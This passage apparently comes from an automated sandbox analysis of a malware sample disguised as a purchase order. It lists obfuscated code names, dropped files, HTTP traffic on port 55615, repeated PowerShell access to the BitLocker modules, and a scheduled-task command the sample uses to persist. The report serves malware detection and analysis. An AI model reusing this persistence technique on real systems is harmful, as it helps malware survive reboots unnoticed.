                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, xcI1enoJkXBKDmiAdr.csHigh entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, X5ql3I12sxhVIpAQQo.csHigh entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Psiccf4bVvVDkx6mSI.csHigh entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.csHigh entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, pLG4Ea5tVQMslBLeve.csHigh entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, vDrWgAuv05qGryjBLgI.csHigh entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, p7yy0t7M82Hmx79AfL.csHigh entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, q72tq2ximplPDGFyoN.csHigh entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, ocaowhuM8mELpeCg1ig.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, S4G9XnevepCQioK3is.csHigh entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, IcmTCBLlejKLSTLxHH.csHigh entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, lBVadcz5bviu8jxc7G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, rmFfbhZkpQQsFEbfol.csHigh entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, zFBqeEjRFBLSRfwf0A.csHigh entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, eQO0SCdvWMrQTMtdfV.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, qQX0XtkHmUSEBYI1Ue.csHigh entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, Bvw1RBceaN523NPJik.csHigh entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, oVpml5PMcJ46Alhh5x.csHigh entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, j7TAQmhL1SaPlhQ8HW.csHigh entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csHigh entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.csHigh entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, LJTjbSmSH66JQvrsi3.csHigh entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, xcI1enoJkXBKDmiAdr.csHigh entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, X5ql3I12sxhVIpAQQo.csHigh entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, Psiccf4bVvVDkx6mSI.csHigh entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.csHigh entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, pLG4Ea5tVQMslBLeve.csHigh entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeJump to dropped file
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
